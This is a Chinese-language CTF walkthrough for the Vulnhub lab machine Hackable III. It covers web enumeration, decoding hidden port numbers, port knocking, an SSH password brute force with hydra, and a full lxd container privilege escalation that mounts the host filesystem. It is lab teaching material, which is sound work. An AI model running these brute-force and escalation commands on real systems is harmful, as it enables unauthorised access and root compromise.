看完这篇 教你玩转渗透测试靶机Vulnhub——Hackable: III

news/2024/12/1 8:55:44/

Vulnhub靶机hackableII渗透测试详解

    • Vulnhub靶机介绍:
    • Vulnhub靶机下载:
    • Vulnhub靶机安装:
    • Vulnhub靶机漏洞详解:
        • ①:信息收集:
        • ②:端口敲门:
        • ③:SSH暴力破解:
        • ④:lxd提权:
        • ⑤:获取FLAG:
    • Vulnhub靶机渗透总结:

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

老样子需要找到flag即可。

Vulnhub靶机下载:

官网下载:https://download.vulnhub.com/hackable/hackable3.ova

Vulnhub靶机安装:

下载好了把安装包解压 然后导入 Oracle VM打开即可。

在这里插入图片描述
在这里插入图片描述

Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用arp-scan -l或者netdiscover发现主机

在这里插入图片描述

使用命令:nmap -sS -sV -T4 -n -p- 192.168.0.105

渗透机kali IP :192.168.0.102 靶机IP :192.168.0.105

在这里插入图片描述
发现开启了2280端口还是老样子先访问一下,然后扫描网页后台dirb、dirsearch、whatweb、gobuster、nikto

F12查看一下源代码,发现了一个邮箱和一个用户jubiscleudo还有/robots.txt/进行访问

dirb扫描发现了/backup/下有个wordlist.txt字典wget命令进行下载,在访问/config/进行base64编码解密得到:10000

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
dirsearch再扫一下发现/css/下面也有东西Brainfuck解码得到4444

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Brainfuck在线解密:http://www.hiencode.com/brain.html

在这里插入图片描述
login.php得源代码中发现了3.jpg进行访问,steghide进行解密得到:65535

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

steghide extract -sf 3.jpg
cat steganopayload148505.txt

这里我们已经可以猜测到了考点:端口敲门 10000,4444,65535 而且还给了22端口

②:端口敲门:

使用命令:knock 192.168.0.105 10000 4444 65535

在这里插入图片描述
在这里插入图片描述

③:SSH暴力破解:

这里我们的思路就是:刚刚得到个字典进行ssh爆破密码 使用工具:hydra 得到密码:onlymy尝试登入登入成功!!

hydra -l jubiscleudo -P wordlist.txt 192.168.0.105 ssh  

在这里插入图片描述
在这里插入图片描述

④:lxd提权:

发现了一个新用户:hackable_3和密码TrOLLED_3

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
lxd 提权原理是下载一个镜像,使用镜像创建容器,将容器目录直接映射到物理主机目录,即可在容器中直接访问物理主机的文件
查看当前系统中的镜像:lxc image list

cd /tmp
git clone https://github.com/saghul/lxd-alpine-builder/
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a i686
lxc image import ./alpine*.tar.gz --alias myimage
lxd init
lxc init myimage mycontainer -c security.privileged=true
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
lxc start mycontainer
lxc exec mycontainer /bin/sh

在这里插入图片描述
在这里插入图片描述

⑤:获取FLAG:

在这里插入图片描述
至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!

Vulnhub靶机渗透总结:

这个靶机难度中等吧

1.信息收集arp-scan -l 获取ip地址 和端口信息 web扫描工具:nikto,dirb,dirbuster,whatweb,ffuf等 查看F12源码信息
2.CTF的一些编码BrainfuckBase64编码
3.端口敲门服务 使用kncok敲门开启ssh hydra和steghide 工具的使用
4.lxd提权的方法 find 查找flag

Hackable系列完结啦,学习到了很多知识点又是收获满满的一天(耶耶耶!)
最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!


http://www.ppmy.cn/news/778775.html

相关文章

天正安装autocad启动失败_天正T20-V2.0版本,在WIN764位系统下运行AUTOCAD2007 不成功,提示AUTOCAD启动失败...

把天正的sys19x64(有时候为2113sys18x64)文件夹里的文件tch_AdoShell.exe的属性做5261调整:以管理员的身4102份运行1653即可。这样操作以后,问题就解决了。记得有时候估计找不到这2种文件夹,这时你可以找带x64里面找找。试试看www.mh456.com防…

CAD梦想画图中的“对象显示顺序”

控制显示重叠对象的顺序。 1.前置 移动选取的对象到当前图形文件所有对象的最上面。使用方法是:执行前置命令以后,单击需要显示到上面位置的对象,然后按enter键或空格键。还有一种是先选择需要移动的对象,然后再执行前置命令。 …

AUTOCAD——超级填充

超级填充中的图片填充是将图片填入闭合区域内。 执行方式 图片填充: 1.输入超级填充命令“SUPERHATCH”(快捷键:SUP),空格键确定。 输入命令 2.弹出“超级图案填充”面板,选择“填充图案类型——图像”…

CAD布局背景颜色怎么改不了?

有些新手设计师在CAD制图过程中,想要修改CAD布局背景颜色的时候,发现CAD布局背景颜色怎么改不了,这该怎么办呢?其实CAD布局背景颜色修改很简单,本文小编就来给大家分享一下浩辰CAD软件中修改CAD布局背景颜色的具体操作…

打开天正建筑显示服务器为空,打开天正提示找不到可用cad版本 - 卡饭网

XP系统打开浏览器时提示找不到服务器或DNS错误的解决方法图文教程 XP系统打开浏览器时提示找不到服务器或DNS错误的解决方法图文教程 DNS是由解析器和域名服务器组成的,用户如果想要上网的话一些要先设置DNS才可以.不过,最近不少使用WindowsXP系统的用户反馈,在打开浏览器时遇到…

微信小程序下拉刷新

1、全部页面设置下拉刷新 在app.json的window节点中,将enablePullDownRefresh设置为true 2、单页面设置下拉刷新 在单个页面的json文件中,将enablePullDownRefresh设置为true backgroundColor:用来配置下拉刷新窗口的背景颜色,仅…

AUTOCAD无法另存的解决办法

1、打开AUTOCAD 2、在命令栏里输入filedia然后再按回车 3、在"输入FILEDIA的新值<0>:" 后面输入1再回车&#xff0c;见下图&#xff1a; 4、重新打开AUTOCAD,点击“另存为” 真行&#xff01;参考&#xff1a; cad无法另存为是什么原因-写客百科

天正如何转为t3_[转载]天正文件转T3格式CAD图

如果别人没有装天正或者天正版本低的话 不转成T3的 别人就看不到文字和标注。 天正转成T3:在左边天正的菜单(文件布图)里的(图形导出)上,里面有T3、T4、T5等; 在天正界面下,天正工具栏--文件布图--图形导出(或批量转旧)---保存类型选择天正3文件---ok T3文件也是可以编辑的…